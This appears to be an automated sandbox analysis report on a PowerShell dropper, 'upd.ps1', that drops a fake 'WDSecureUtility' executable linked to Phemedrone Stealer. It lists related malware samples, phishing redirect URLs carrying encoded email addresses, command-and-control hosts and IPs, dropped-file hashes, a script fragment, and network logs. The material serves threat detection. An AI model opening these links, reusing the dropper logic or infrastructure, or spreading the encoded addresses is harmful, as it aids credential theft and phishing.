 | https://www.google.com/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&esrc=WSECxFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ9mfdQ6lDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%E2%80%8Bg%C2%ADloba%C2%ADlproc%C2%ADessi%C2%ADngne%C2%ADtwo%C2%ADrk%2E%E2%80%8Bne%C2%ADt%2Ffghd%2Fgfjfjfg%2FBpORLlSyDHhQozoQ5XBZtBNm/dGhvbHplckByZGd1c2EuY29t | Get hash | malicious | HTMLPhisher, Tycoon2FA | Browse
 | https://g.page/r/CbPyKO_ogGK3EAg/review | Get hash | malicious | HTMLPhisher, Tycoon2FA | Browse
 | P09Qwe9fqsKdQIyTGnGxNs8xS[1] | Get hash | malicious | Tycoon2FA | Browse
 | vm AUDIO_QzOXYQIfIQZ VOICE September 11th, 2024 attachment.html | Get hash | malicious | HTMLPhisher, Tycoon2FA | Browse
 | Remittance AdviceNote c6b2e2a43485b7b75999a5332e86646f | Get hash | malicious | HTMLPhisher, Tycoon2FA | Browse
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
get.geojs.io | WDSecureUtil.exe | Get hash | malicious | Phemedrone Stealer | Browse
• 104.26.1.100
 | DBp7mBJwqD.exe | Get hash | malicious | Phemedrone Stealer | Browse
• 172.67.70.233
 | nuVM6HVKRG.exe | Get hash | malicious | Phemedrone Stealer | Browse
• 104.26.1.100
 | pdLBHF2jCE.exe | Get hash | malicious | Phemedrone Stealer | Browse
• 104.26.1.100
 | file.exe | Get hash | malicious | Unknown | Browse
• 104.26.0.100
 | file.exe | Get hash | malicious | Unknown | Browse
• 104.26.0.100
 | http://braintumourresearch.org | Get hash | malicious | Unknown | Browse
• 104.26.1.100
 | https://www.filemail.com/t/NU6GESpW | Get hash | malicious | HTMLPhisher, Tycoon2FA | Browse
• 104.26.0.100
 | https://www.google.com/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&esrc=WSECxFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ9mfdQ6lDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2Fkeyconserv.com%2Fskoda%2FWIA2PParYO43z1bgCVStAX12/ZHVjZXIua2FtZ2FuZ0BjbmVzc3QuZ291di5xYy5jYQ== | Get hash | malicious | Unknown | Browse
• 172.67.70.233
 | https://www.google.com/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&esrc=WSECxFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ9mfdQ6lDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2Ffilmycurry.in%2Fskoda%2FBxs3IiLfKU2eWewQOro8W1Fa/dGVycmkucm9zYUByYXZlaXMuY29t | Get hash | malicious | Tycoon2FA | Browse
• 104.26.1.100
apitradingview.com | DBp7mBJwqD.exe | Get hash | malicious | Phemedrone Stealer | Browse
• 86.104.15.60
api.telegram.org | WDSecureUtil.exe | Get hash | malicious | Phemedrone Stealer | Browse
• 149.154.167.220
 | DBp7mBJwqD.exe | Get hash | malicious | Phemedrone Stealer | Browse
• 149.154.167.220
 | nuVM6HVKRG.exe | Get hash | malicious | Phemedrone Stealer | Browse
• 149.154.167.220
 | pdLBHF2jCE.exe | Get hash | malicious | Phemedrone Stealer | Browse
• 149.154.167.220
 | Permintaan Untuk Sebutharga RFQ 087624_Pdf.vbs | Get hash | malicious | GuLoader, Snake Keylogger | Browse
• 149.154.167.220
 | Permintaan Untuk Sebutharga RFQ 087624.vbs | Get hash | malicious | GuLoader, Snake Keylogger | Browse
• 149.154.167.220
 | Request for Quotation MK FMHSRFQ241104.vbs | Get hash | malicious | GuLoader, Snake Keylogger | Browse
• 149.154.167.220
 | Request for Quotation_MYMRT.vbs | Get hash | malicious | GuLoader, Snake Keylogger, VIP Keylogger | Browse
• 149.154.167.220
 | DOC11042024.exe | Get hash | malicious | GuLoader, Snake Keylogger | Browse
• 149.154.167.220
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
TELEGRAMRU | WDSecureUtil.exe | Get hash | malicious | Phemedrone Stealer | Browse
• 149.154.167.220
 | DBp7mBJwqD.exe | Get hash | malicious | Phemedrone Stealer | Browse
• 149.154.167.220
 | nuVM6HVKRG.exe | Get hash | malicious | Phemedrone Stealer | Browse
• 149.154.167.220
 | pdLBHF2jCE.exe | Get hash | malicious | Phemedrone Stealer | Browse
• 149.154.167.220
 | Request for Quotation MK FMHSRFQ241104.vbe | Get hash | malicious | GuLoader, Snake Keylogger | Browse
• 149.154.167.220
 | Permintaan Untuk Sebutharga RFQ 087624_Pdf.vbs | Get hash | malicious | GuLoader, Snake Keylogger | Browse
• 149.154.167.220
 | Permintaan Untuk Sebutharga RFQ 087624.vbs | Get hash | malicious | GuLoader, Snake Keylogger | Browse
• 149.154.167.220
 | Request for Quotation MK FMHSRFQ241104.vbs | Get hash | malicious | GuLoader, Snake Keylogger | Browse
• 149.154.167.220
 | Request for Quotation_MYMRT.vbs | Get hash | malicious | GuLoader, Snake Keylogger, VIP Keylogger | Browse
• 149.154.167.220
 | DOC11042024.exe | Get hash | malicious | GuLoader, Snake Keylogger | Browse
• 149.154.167.220
CLOUDFLARENETUS | file.exe | Get hash | malicious | LummaC, Stealc, Vidar | Browse
• 188.114.96.3
 | WDSecureUtil.exe | Get hash | malicious | Phemedrone Stealer | Browse
• 104.26.1.100
 | DBp7mBJwqD.exe | Get hash | malicious | Phemedrone Stealer | Browse
• 172.67.70.233
 | EROctober 31, 2024_Amendment_for_J.thepautIyNURVhUTlVNUkFORE9NMTkjIw==-1.html | Get hash | malicious | Unknown | Browse
• 104.21.55.69
 | nuVM6HVKRG.exe | Get hash | malicious | Phemedrone Stealer | Browse
• 104.26.1.100
 | pdLBHF2jCE.exe | Get hash | malicious | Phemedrone Stealer | Browse
• 104.26.1.100
 | QUOTATION#09678.exe | Get hash | malicious | AgentTesla | Browse
• 172.67.74.152
 | file.exe | Get hash | malicious | LummaC, Stealc | Browse
• 188.114.97.3
 | Request for Quotation MK FMHSRFQ241104.vbe | Get hash | malicious | GuLoader, Snake Keylogger | Browse
• 188.114.97.3
 | Permintaan Untuk Sebutharga RFQ 087624_Pdf.vbs | Get hash | malicious | GuLoader, Snake Keylogger | Browse
• 188.114.97.3
BELCLOUDBG | DBp7mBJwqD.exe | Get hash | malicious | Phemedrone Stealer | Browse
• 86.104.15.60
 | rhqubIGcyN.exe | Get hash | malicious | Clipboard Hijacker, Cryptbot | Browse
• 185.244.181.140
 | file.exe | Get hash | malicious | Amadey, AsyncRAT, Clipboard Hijacker, Cryptbot, MicroClip, Neoreklami, RedLine | Browse
• 185.244.181.140
 | jYDYjpSbvf.exe | Get hash | malicious | LummaC, Amadey, Clipboard Hijacker, LummaC Stealer, RedLine, SmokeLoader, Stealc | Browse
• 185.244.181.140
 | file.exe | Get hash | malicious | Clipboard Hijacker, Cryptbot | Browse
• 185.244.181.140
 | file.exe | Get hash | malicious | Clipboard Hijacker, Cryptbot | Browse
• 185.244.181.140
 | Set-up.exe | Get hash | malicious | Clipboard Hijacker, Cryptbot | Browse
• 185.244.181.140
 | file.exe | Get hash | malicious | Clipboard Hijacker, Cryptbot | Browse
• 185.244.181.140
 | Z2LPSpO1yU.exe | Get hash | malicious | Clipboard Hijacker, Cryptbot | Browse
• 185.244.181.140
 | Set-up.exe | Get hash | malicious | Clipboard Hijacker, Cryptbot | Browse
• 185.244.181.140
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
3b5074b1b5d032e5620f69f9f700ff0e | WDSecureUtil.exe | Get hash | malicious | Phemedrone Stealer | Browse
• 149.154.167.220
• 86.104.15.60
• 172.67.70.233
 | DBp7mBJwqD.exe | Get hash | malicious | Phemedrone Stealer | Browse
• 149.154.167.220
• 86.104.15.60
• 172.67.70.233
 | nuVM6HVKRG.exe | Get hash | malicious | Phemedrone Stealer | Browse
• 149.154.167.220
• 86.104.15.60
• 172.67.70.233
 | pdLBHF2jCE.exe | Get hash | malicious | Phemedrone Stealer | Browse
• 149.154.167.220
• 86.104.15.60
• 172.67.70.233
 | QUOTATION#09678.exe | Get hash | malicious | AgentTesla | Browse
• 149.154.167.220
• 86.104.15.60
• 172.67.70.233
 | Fattura88674084.vbs | Get hash | malicious | Unknown | Browse
• 149.154.167.220
• 86.104.15.60
• 172.67.70.233
 | givingbestthignswithgreatheatcaptialthingstodo.hta | Get hash | malicious | Cobalt Strike, HTMLPhisher | Browse
• 149.154.167.220
• 86.104.15.60
• 172.67.70.233
 | Request for Quotation MK FMHSRFQ241104.vbe | Get hash | malicious | GuLoader, Snake Keylogger | Browse
• 149.154.167.220
• 86.104.15.60
• 172.67.70.233
 | Permintaan Untuk Sebutharga RFQ 087624_Pdf.vbs | Get hash | malicious | GuLoader, Snake Keylogger | Browse
• 149.154.167.220
• 86.104.15.60
• 172.67.70.233
 | Purchase order.vbs | Get hash | malicious | Unknown | Browse
• 149.154.167.220
• 86.104.15.60
• 172.67.70.233
                                                          No context
                                                          Process:C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe
                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):240640
                                                          Entropy (8bit):5.163089509953704
                                                          Encrypted:false
                                                          SSDEEP:1536:BmDUeGs1J7fIwquWnkJwXkbLV6ZmB9IADS1u0TjfZ3LWj3Le5eRjIIVwObSqI+nU:MDx1J7fIwpq+8KAh3LAEctWO3/ET
                                                          MD5:0FF0576F91E4F548CA0D223462B2586C
                                                          SHA1:D9D79541127FEBDB03E0C0DE663D42B4B33FEAD9
                                                          SHA-256:10273F0F52AECAAF9688F7BBC250BC1E75C3CFD054831C78FFFADADFB65D07A6
                                                          SHA-512:0C41762E9967AAC27F9D064EF89E6C8CC145D906FCFA1F6420ADD3BC13E0B8D4C6FE62E828AEC555722F90A98B7B6CBA73EC3799EBF1D0A40FAB3F191BDAD1E2
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 68%
                                                          Reputation:low
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....(.g..............0.................. ........@.. ....................................`.....................................O.... ............................................................................... ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc..............................@..B........................H............B......[.....................................................{....*..{....*V.(......}......}....*...0..A........u........4.,/(.....{.....{....o....,.(.....{.....{....o....*.*.*. .s.. )UU.Z(.....{....o....X )UU.Z(.....{....o....X*...0..b........r...p......%..{.......%q.........-.&.+.......o.....%..{.......%q.........-.&.+.......o.....(....*..{....*..{....*V.(......}......}....*.0..A........u........4.,/(.....{.....{....o....,.(.....{.....{....o....*.*.*. (... )UU.
                                                          Process:C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe
                                                          File Type:CSV text
                                                          Category:dropped
                                                          Size (bytes):1498
                                                          Entropy (8bit):5.364175471524945
                                                          Encrypted:false
                                                          SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNt1qE4GIs6sXE4NpYE4KD:MxHKQwYHKGSI6oPtHTHhAHKKkt1qHGIo
                                                          MD5:118C0052FF32427F2D565A3D20BCAA00
                                                          SHA1:016EF00DEC0507D0B7B776CF9FC45046CD90BDBF
                                                          SHA-256:2AC954DFE8E43E443E582F59101F6D897D3605667BB863920FE7AEA5A101267C
                                                          SHA-512:8542C68B102DBEBF021D15C64D4DECED52AD95898BFC1390F8B9AD6E2D65E33D48F1924D526B66F58CB6CB136847BAB28B5B1D706675556B925C9D8F26A25517
                                                          Malicious:false
                                                          Reputation:low
                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567f
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):64
                                                          Entropy (8bit):1.1940658735648508
                                                          Encrypted:false
                                                          SSDEEP:3:NlllulJnp/p:NllU
                                                          MD5:BC6DB77EB243BF62DC31267706650173
                                                          SHA1:9E42FEFC2E92DE0DB2A2C9911C866320E41B30FF
                                                          SHA-256:5B000939E436B6D314E3262887D8DB6E489A0DDF1E10E5D3D80F55AA25C9FC27
                                                          SHA-512:91DC4935874ECA2A4C8DE303D83081FE945C590208BB844324D1E0C88068495E30AAE2321B3BA8A762BA08DAAEB75D9931522A47C5317766C27E6CE7D04BEEA9
                                                          Malicious:false
                                                          Reputation:moderate, very likely benign file
                                                          Preview:@...e.................................X..............@..........
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Reputation:high, very likely benign file
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Reputation:high, very likely benign file
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):6222
                                                          Entropy (8bit):3.704748984896851
                                                          Encrypted:false
                                                          SSDEEP:96:tolrCNP8HkvhkvCCtPnm1dXjHZc61dXEHZcD:tolGPYPnm1Xc61UcD
                                                          MD5:3822C3C37B0981367966D5383B738BA5
                                                          SHA1:945C18F1E57900C6E87D3A0255A24C47660943DC
                                                          SHA-256:F854991FFBF84F94F74507C3ED1872F489B921FFF1C0F9154B82F2849AFF00CC
                                                          SHA-512:75557C00FC507D45F0245802A4DC2B17D9B73F8D4DF24DB23C146F21D013ADA5A6CDA119CCF1280CE2E04D6A1A8653202D5DD4C2BF4160EA78A983B373EEA061
                                                          Malicious:false
                                                          Preview:...................................FL..................F.".. ......Yd......r....z.:{.............................:..DG..Yr?.D..U..k0.&...&.......y.Yd......m......!r........t...CFSF..1.....EW)B..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW)BdYFE..........................d...A.p.p.D.a.t.a...B.V.1.....dYDE..Roaming.@......EW)BdYDE..........................Z`..R.o.a.m.i.n.g.....\.1.....EW.C..MICROS~1..D......EW)BdYAE............................ .M.i.c.r.o.s.o.f.t.....V.1.....EW.D..Windows.@......EW)BdYAE............................F.W.i.n.d.o.w.s.......1.....EW+B..STARTM~1..n......EW)BdYAE....................D.....b60.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EW(C..Programs..j......EW)BdYAE....................@.......D.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW)BEW)B..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW)BdYGE.....0..........
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):6222
                                                          Entropy (8bit):3.704748984896851
                                                          Encrypted:false
                                                          SSDEEP:96:tolrCNP8HkvhkvCCtPnm1dXjHZc61dXEHZcD:tolGPYPnm1Xc61UcD
                                                          MD5:3822C3C37B0981367966D5383B738BA5
                                                          SHA1:945C18F1E57900C6E87D3A0255A24C47660943DC
                                                          SHA-256:F854991FFBF84F94F74507C3ED1872F489B921FFF1C0F9154B82F2849AFF00CC
                                                          SHA-512:75557C00FC507D45F0245802A4DC2B17D9B73F8D4DF24DB23C146F21D013ADA5A6CDA119CCF1280CE2E04D6A1A8653202D5DD4C2BF4160EA78A983B373EEA061
                                                          Malicious:false
                                                          Preview:...................................FL..................F.".. ......Yd......r....z.:{.............................:..DG..Yr?.D..U..k0.&...&.......y.Yd......m......!r........t...CFSF..1.....EW)B..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW)BdYFE..........................d...A.p.p.D.a.t.a...B.V.1.....dYDE..Roaming.@......EW)BdYDE..........................Z`..R.o.a.m.i.n.g.....\.1.....EW.C..MICROS~1..D......EW)BdYAE............................ .M.i.c.r.o.s.o.f.t.....V.1.....EW.D..Windows.@......EW)BdYAE............................F.W.i.n.d.o.w.s.......1.....EW+B..STARTM~1..n......EW)BdYAE....................D.....b60.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EW(C..Programs..j......EW)BdYAE....................@.......D.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW)BEW)B..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW)BdYGE.....0..........
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):240640
                                                          Entropy (8bit):5.163089509953704
                                                          Encrypted:false
                                                          SSDEEP:1536:BmDUeGs1J7fIwquWnkJwXkbLV6ZmB9IADS1u0TjfZ3LWj3Le5eRjIIVwObSqI+nU:MDx1J7fIwpq+8KAh3LAEctWO3/ET
                                                          MD5:0FF0576F91E4F548CA0D223462B2586C
                                                          SHA1:D9D79541127FEBDB03E0C0DE663D42B4B33FEAD9
                                                          SHA-256:10273F0F52AECAAF9688F7BBC250BC1E75C3CFD054831C78FFFADADFB65D07A6
                                                          SHA-512:0C41762E9967AAC27F9D064EF89E6C8CC145D906FCFA1F6420ADD3BC13E0B8D4C6FE62E828AEC555722F90A98B7B6CBA73EC3799EBF1D0A40FAB3F191BDAD1E2
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          • Antivirus: ReversingLabs, Detection: 68%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....(.g..............0.................. ........@.. ....................................`.....................................O.... ............................................................................... ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc..............................@..B........................H............B......[.....................................................{....*..{....*V.(......}......}....*...0..A........u........4.,/(.....{.....{....o....,.(.....{.....{....o....*.*.*. .s.. )UU.Z(.....{....o....X )UU.Z(.....{....o....X*...0..b........r...p......%..{.......%q.........-.&.+.......o.....%..{.......%q.........-.&.+.......o.....(....*..{....*..{....*V.(......}......}....*.0..A........u........4.,/(.....{.....{....o....,.(.....{.....{....o....*.*.*. (... )UU.
                                                          File type:Unicode text, UTF-8 text, with CRLF line terminators
                                                          Entropy (8bit):5.470113038070015
                                                          TrID:
                                                            File name:upd.ps1
                                                            File size:1'111 bytes
                                                            MD5:901388115be5c8209d83642d8d5d9b51
                                                            SHA1:d2293a97b9772328bb60e822027063deffba0c4d
                                                            SHA256:b54e7cd114b771b8b81e8c9b461ab611c3a5fddc575bdf1da132f5863c5d1e72
                                                            SHA512:798c57ea2b8cce8fc050ac4bdb2b054bfa8b808c404dafcfa4b423ec1197e11a7150a12578963a0b5b863c465a705cc618e7d00c168635ffc6eb60f118a46d1c
                                                            SSDEEP:24:kMTpdMroh+0O3MGFHPv6g1boyAace/CbVna2N9FAF7DvlRvM3:f7tOv9PvBFX/CbVxxAFftRvM3
                                                            TLSH:8D21EE222716156B43606B576C81A909FEAF88FF27B64258341CD81E2F72A38671D59C
                                                            File Content Preview:# .................... .................. .......... ...... .......... ............$randomDigits = Get-Random -Minimum 100 -Maximum 999..$exeName = "WDSecureUtility_$randomDigits.exe"..$exePath = "$env:AppData\$exeName"....try {.. # ................ ..
                                                            Icon Hash:3270d6baae77db44
                                                            Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                                                            2024-11-04T09:42:32.976382+0100 | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 1 | 172.202.163.200 | 443 | 192.168.2.8 | 49708 | TCP
                                                            2024-11-04T09:43:13.139898+0100 | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 1 | 172.202.163.200 | 443 | 192.168.2.8 | 49713 | TCP
                                                            Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                            Nov 4, 2024 09:42:16.990526915 CET | 49705 | 443 | 192.168.2.8 | 86.104.15.60
                                                            Nov 4, 2024 09:42:16.990561008 CET | 443 | 49705 | 86.104.15.60 | 192.168.2.8
                                                            Nov 4, 2024 09:42:16.990648031 CET | 49705 | 443 | 192.168.2.8 | 86.104.15.60
                                                            Nov 4, 2024 09:42:17.002676010 CET | 49705 | 443 | 192.168.2.8 | 86.104.15.60
                                                            Nov 4, 2024 09:42:17.002686977 CET | 443 | 49705 | 86.104.15.60 | 192.168.2.8
                                                            Nov 4, 2024 09:42:17.932914972 CET | 443 | 49705 | 86.104.15.60 | 192.168.2.8
                                                            Nov 4, 2024 09:42:17.933043003 CET | 49705 | 443 | 192.168.2.8 | 86.104.15.60
                                                            Nov 4, 2024 09:42:17.944354057 CET | 49705 | 443 | 192.168.2.8 | 86.104.15.60
                                                            Nov 4, 2024 09:42:17.944371939 CET | 443 | 49705 | 86.104.15.60 | 192.168.2.8
                                                            Nov 4, 2024 09:42:17.944724083 CET | 443 | 49705 | 86.104.15.60 | 192.168.2.8
                                                            Nov 4, 2024 09:42:17.956399918 CET | 49705 | 443 | 192.168.2.8 | 86.104.15.60
                                                            Nov 4, 2024 09:42:18.003324032 CET | 443 | 49705 | 86.104.15.60 | 192.168.2.8
                                                            Nov 4, 2024 09:42:18.231143951 CET | 443 | 49705 | 86.104.15.60 | 192.168.2.8
                                                            Nov 4, 2024 09:42:18.286372900 CET | 49705 | 443 | 192.168.2.8 | 86.104.15.60
                                                            Nov 4, 2024 09:42:18.286401987 CET | 443 | 49705 | 86.104.15.60 | 192.168.2.8
                                                            Nov 4, 2024 09:42:18.333260059 CET | 49705 | 443 | 192.168.2.8 | 86.104.15.60
                                                            Nov 4, 2024 09:42:18.378359079 CET | 443 | 49705 | 86.104.15.60 | 192.168.2.8
                                                            Nov 4, 2024 09:42:18.378372908 CET | 443 | 49705 | 86.104.15.60 | 192.168.2.8
                                                            Nov 4, 2024 09:42:18.378439903 CET | 443 | 49705 | 86.104.15.60 | 192.168.2.8
                                                            Nov 4, 2024 09:42:18.378451109 CET | 443 | 49705 | 86.104.15.60 | 192.168.2.8
                                                            Nov 4, 2024 09:42:18.378465891 CET | 443 | 49705 | 86.104.15.60 | 192.168.2.8
                                                            Nov 4, 2024 09:42:18.378465891 CET | 49705 | 443 | 192.168.2.8 | 86.104.15.60
                                                            Nov 4, 2024 09:42:18.378499985 CET | 443 | 49705 | 86.104.15.60 | 192.168.2.8
                                                            Nov 4, 2024 09:42:18.378571033 CET | 49705 | 443 | 192.168.2.8 | 86.104.15.60
                                                            Nov 4, 2024 09:42:18.426997900 CET | 49705 | 443 | 192.168.2.8 | 86.104.15.60
                                                            Nov 4, 2024 09:42:18.500061989 CET | 443 | 49705 | 86.104.15.60 | 192.168.2.8
                                                            Nov 4, 2024 09:42:18.500077009 CET | 443 | 49705 | 86.104.15.60 | 192.168.2.8
                                                            Nov 4, 2024 09:42:18.500099897 CET | 443 | 49705 | 86.104.15.60 | 192.168.2.8
                                                            Nov 4, 2024 09:42:18.500106096 CET | 443 | 49705 | 86.104.15.60 | 192.168.2.8
                                                            Nov 4, 2024 09:42:18.500125885 CET | 49705 | 443 | 192.168.2.8 | 86.104.15.60
                                                            Nov 4, 2024 09:42:18.500133038 CET | 443 | 49705 | 86.104.15.60 | 192.168.2.8
                                                            Nov 4, 2024 09:42:18.500165939 CET | 49705 | 443 | 192.168.2.8 | 86.104.15.60
                                                            Nov 4, 2024 09:42:18.500168085 CET | 443 | 49705 | 86.104.15.60 | 192.168.2.8
                                                            Nov 4, 2024 09:42:18.500188112 CET | 49705 | 443 | 192.168.2.8 | 86.104.15.60
                                                            Nov 4, 2024 09:42:18.500647068 CET | 49705 | 443 | 192.168.2.8 | 86.104.15.60
                                                            Nov 4, 2024 09:42:18.621895075 CET | 443 | 49705 | 86.104.15.60 | 192.168.2.8
                                                            Nov 4, 2024 09:42:18.621907949 CET | 443 | 49705 | 86.104.15.60 | 192.168.2.8
                                                            Nov 4, 2024 09:42:18.621948004 CET | 443 | 49705 | 86.104.15.60 | 192.168.2.8
                                                            Nov 4, 2024 09:42:18.622152090 CET | 49705 | 443 | 192.168.2.8 | 86.104.15.60
                                                            Nov 4, 2024 09:42:18.622152090 CET | 49705 | 443 | 192.168.2.8 | 86.104.15.60
                                                            Nov 4, 2024 09:42:18.622179985 CET | 443 | 49705 | 86.104.15.60 | 192.168.2.8
                                                            Nov 4, 2024 09:42:18.622195959 CET | 443 | 49705 | 86.104.15.60 | 192.168.2.8
                                                            Nov 4, 2024 09:42:18.622232914 CET | 49705 | 443 | 192.168.2.8 | 86.104.15.60
                                                            Nov 4, 2024 09:42:18.743983984 CET | 443 | 49705 | 86.104.15.60 | 192.168.2.8
                                                            Nov 4, 2024 09:42:18.744012117 CET | 443 | 49705 | 86.104.15.60 | 192.168.2.8
                                                            Nov 4, 2024 09:42:18.744100094 CET | 49705 | 443 | 192.168.2.8 | 86.104.15.60
                                                            Nov 4, 2024 09:42:18.744117975 CET | 443 | 49705 | 86.104.15.60 | 192.168.2.8
                                                            Nov 4, 2024 09:42:18.744169950 CET | 49705 | 443 | 192.168.2.8 | 86.104.15.60
                                                            Nov 4, 2024 09:42:18.865384102 CET | 443 | 49705 | 86.104.15.60 | 192.168.2.8
                                                            Nov 4, 2024 09:42:18.865407944 CET | 443 | 49705 | 86.104.15.60 | 192.168.2.8
                                                            Nov 4, 2024 09:42:18.865498066 CET | 49705 | 443 | 192.168.2.8 | 86.104.15.60
                                                            Nov 4, 2024 09:42:18.865525007 CET | 443 | 49705 | 86.104.15.60 | 192.168.2.8
                                                            Nov 4, 2024 09:42:18.865600109 CET | 49705 | 443 | 192.168.2.8 | 86.104.15.60
                                                            Nov 4, 2024 09:42:18.987020016 CET | 443 | 49705 | 86.104.15.60 | 192.168.2.8
                                                            Nov 4, 2024 09:42:18.987042904 CET | 443 | 49705 | 86.104.15.60 | 192.168.2.8
                                                            Nov 4, 2024 09:42:18.987303972 CET | 49705 | 443 | 192.168.2.8 | 86.104.15.60
                                                            Nov 4, 2024 09:42:18.987330914 CET | 443 | 49705 | 86.104.15.60 | 192.168.2.8
                                                            Nov 4, 2024 09:42:18.987387896 CET | 49705 | 443 | 192.168.2.8 | 86.104.15.60
                                                            Nov 4, 2024 09:42:19.109865904 CET | 443 | 49705 | 86.104.15.60 | 192.168.2.8
                                                            Nov 4, 2024 09:42:19.109889984 CET | 443 | 49705 | 86.104.15.60 | 192.168.2.8
                                                            Nov 4, 2024 09:42:19.109961987 CET | 49705 | 443 | 192.168.2.8 | 86.104.15.60
                                                            Nov 4, 2024 09:42:19.109989882 CET | 443 | 49705 | 86.104.15.60 | 192.168.2.8
